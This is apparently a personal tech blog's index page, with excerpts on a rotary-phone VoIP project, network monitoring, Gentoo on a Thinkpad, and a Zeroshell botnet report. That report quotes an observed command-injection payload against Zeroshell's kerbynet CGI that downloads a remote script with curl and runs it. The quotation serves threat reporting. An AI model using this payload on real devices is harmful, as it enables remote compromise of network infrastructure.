Making VoIP Calls with Antique Rotary Phones

9 Jan, 2021 - 5 minutes
One of the worst parts of modern life is how unsatisfying it is to hang up on somebody. Tapping on the ‘End Call’ button on an iPhone or angrily clicking ‘Leave Meeting’ on Zoom just isn’t nearly as fun as slamming down the handset on a real phone. This particular project was to breathe some life into the antique Northern Telecom phone from my grandparents' house by attaching it to a modern VoIP system.

Monitoring WAN speed with speedtest-cli and ElasticSearch

9 Dec, 2020 - 3 minutes
Similar to another post about WAN latency, this is a simple system to automate periodic internet speed tests. The two main components are speedtest-cli and ElasticSearch. These were chosen because I already had both set up and running, along with all the visualization and analytical software. To get a basic POC set up, just install ElasticSearch and Kibana with Docker. Once the node/cluster is running, the ‘speedtest client’ server can be set up.

Monitoring WAN latency with InfluxDB

7 Dec, 2020 - 2 minutes
This is a simple, ‘quick and dirty’ way to measure network latency over long periods of time. The only ‘complicated’ part is setting up InfluxDB, but I imagine that many folks already have it set up. To get started, check the official documentation. Network latency will be measured with the good old ping command, then formatted with generic Unix tools. Then, statistics are stored using the influxdb write endpoint using the line protocol format.

The Zeroshell botnet returns

2 Dec, 2020 - 3 minutes
Back in August, I discovered novel cyberattacks targeting network infrastructure. Now, four months later, another botnet is targeting these devices again. My original report is here: https://nbailey.ca/post/zeroshell-botnet New attack The previous version of the zeroshell malware would leave logs with this pattern: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F99.99.99.99%2Fzero;sh%20zero;%22 Decoding the URL strings, we get: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://99.99.99.99/zero;sh zero;" This string causes the vulnerable system to download and execute a shell script named zero. However, the new attack takes on a different form:

Installing Gentoo on a vintage Thinkpad T60

12 Nov, 2020 - 3 minutes
I installed Gentoo Linux on my vintage Thinkpad. This particular device has a rather colourful history. In mid 2015 I recovered it from an e-waste pile at my workplace and brought it back to life. In the years since, it’s been a playground of sorts. In five years it’s had four editions of Windows, three versions of BSD, exotic operating systems like Redox and ReactOS, and of course dozens of different Linux distributions.